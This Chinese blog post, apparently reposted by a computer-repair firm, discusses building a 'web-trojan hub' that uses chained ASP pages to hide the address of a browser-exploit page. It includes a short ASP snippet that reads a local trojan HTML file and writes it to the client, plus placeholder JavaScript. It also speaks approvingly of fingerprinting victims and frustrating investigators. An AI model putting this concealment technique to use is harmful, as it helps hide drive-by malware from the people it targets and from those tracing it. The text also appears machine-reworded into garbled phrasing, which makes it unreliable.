网马中枢

  实在想想就会知道，网马的exp总会有袒露的时候，也便是说，我的体系情况只需满足条件就可以获得这个网马的exp。经过结合服务端的技能本领，我们可以隐藏网马exp的地址，但是却无法保证这个exp不袒暴露来，exp终究要在你的浏览器上执行恶意行为。
  好比上面code可以隐藏网马exp的地址，却不得不袒暴露这个exp：
  http://127.0.0.1/s_trojan/index.html的代码：
  http://127.0.0.1/s_trojan/blackbox_0.asp的代码：
  http://127.0.0.1/s_trojan/blackbox_1.asp的代码：
  document.write(’js go here……’)
  <%
  function xss()
  response.write “alert(’hello asp.’);”
  end function
  xss()
  function f(filename)
  set objFSO=Server.CreateObject(”Scripting.FileSystemObject”)
  set objCountFile=objFSO.OpenTextFile(Server.MapPath(filename),1,True)
  f=objCountFile.readall
  objCountFile.close
  set objCountFile=nothing
  set objFSO=nothing
  end function
  x=f(”last_trojan.html”)
  response.write x
  %>
  trojan()
  最终的网马exp地址为http://127.0.0.1/s_trojan/last_trojan.html。blackbox_1.asp的代码既要保证服务端正确执行，又要保证客户端能正确执行其最终的JS代码。实在这些中间asp文件会袒露最终的网马exp的内容。但是却不会袒露地址。
  结合服务端技能实在能做很多事，网马也将更增强大，更容易以服务端为中间而被控制着:-)。强大的网马中枢应该要能果断目的体系的情况而选择性地运行，并有细致的统计功能。如许会给跟踪者带来许多贫苦:-)。但，是不是能真正隐藏网马exp呢？原则上是不可的，由于exp总要输入，不然你的浏览器毛病怎样被触发？
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：